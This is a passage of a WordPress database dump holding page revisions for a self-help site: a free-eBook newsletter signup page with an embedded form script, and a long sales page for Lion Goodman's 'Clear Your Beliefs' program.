un-subscribe anytime.]</p>\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-12 17:59:30', '2015-05-12 22:59:30', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2180, 2, '2015-05-12 18:04:47', '2015-05-12 23:04:47', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" /><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center></h1>\r\n<div class="videoWrapper"><center><iframe src="https://player.vimeo.com/video/127646104" width="500" height="281" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></center></div>\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'open', 'open', '', '588-revision-v1', '', '', '2015-05-12 18:04:47', '2015-05-12 23:04:47', '', 588, 'http://clearyourbeliefs.com/588-revision-v1/', 0, 'revision', '', 0),
(2181, 2, '2015-05-12 18:05:28', '2015-05-12 23:05:28', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" /><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center></h1>\r\n\r\n<p><div class="videoWrapper"><center><iframe src="https://player.vimeo.com/video/127646104" width="500" height="281" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></center></div></p>\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'open', 'open', '', '588-revision-v1', '', '', '2015-05-12 18:05:28', '2015-05-12 23:05:28', '', 588, 'http://clearyourbeliefs.com/588-revision-v1/', 0, 'revision', '', 0),
(2182, 2, '2015-05-12 18:07:03', '2015-05-12 23:07:03', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" /><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center></h1>\r\n\r\n<p><div class=''embed-container''><center><iframe src="https://player.vimeo.com/video/127646104" width="500" height="281" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></center></div></p>\r\n\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\n\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.</p>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'Free eBook:  Clear Your Beliefs!', '', 'inherit', 'open', 'open', '', '588-revision-v1', '', '', '2015-05-12 18:07:03', '2015-05-12 23:07:03', '', 588, 'http://clearyourbeliefs.com/588-revision-v1/', 0, 'revision', '', 0),
(2183, 2, '2015-05-12 18:07:34', '2015-05-12 23:07:34', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" /><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center></h1>\r\n\r\n<center><div class=''embed-container''><iframe src="https://player.vimeo.com/video/127646104" width="500" height="281" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe></center></div>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-12 18:07:34', '2015-05-12 23:07:34', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2184, 2, '2015-05-17 18:41:01', '2015-05-17 23:41:01', '&nbsp;\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<p>&nbsp;</p>\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;</p>\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n<p>&nbsp;</p>\n<h1>Why Does This Happen?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p>\n<p>Neuroscientists call the brain''s ability to change over time "neuroplasticity."</p>\n<p>It can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n<p>&nbsp;</p>\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></p>\n<p>If you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<p>&nbsp;</p>\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p><strong>We literally create our reality with our beliefs.</strong></p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.</p>\n<p>&nbsp;</p>\n<h1>Upgrade Your Human Operating System</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong></p>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a 